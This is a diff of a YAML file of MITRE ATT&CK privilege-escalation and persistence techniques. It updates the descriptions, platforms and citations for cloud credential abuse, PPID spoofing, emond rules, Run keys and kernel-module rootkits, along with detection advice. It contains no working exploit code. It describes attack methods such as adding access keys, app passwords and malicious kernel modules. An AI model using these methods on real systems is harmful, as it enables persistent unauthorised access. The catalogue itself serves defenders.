       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19704,11 +19999,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19719,12 +20018,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19733,6 +20039,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19741,13 +20048,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19773,10 +20083,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19785,10 +20103,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19805,9 +20133,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19871,7 +20196,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19960,7 +20284,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20018,7 +20341,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20043,12 +20366,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20074,7 +20396,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20088,7 +20409,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20115,8 +20435,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20127,7 +20447,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20198,7 +20519,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20225,7 +20546,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20265,7 +20585,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20285,12 +20605,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20344,11 +20663,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20435,9 +20753,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20450,12 +20768,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20491,16 +20808,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20541,143 +20857,141 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
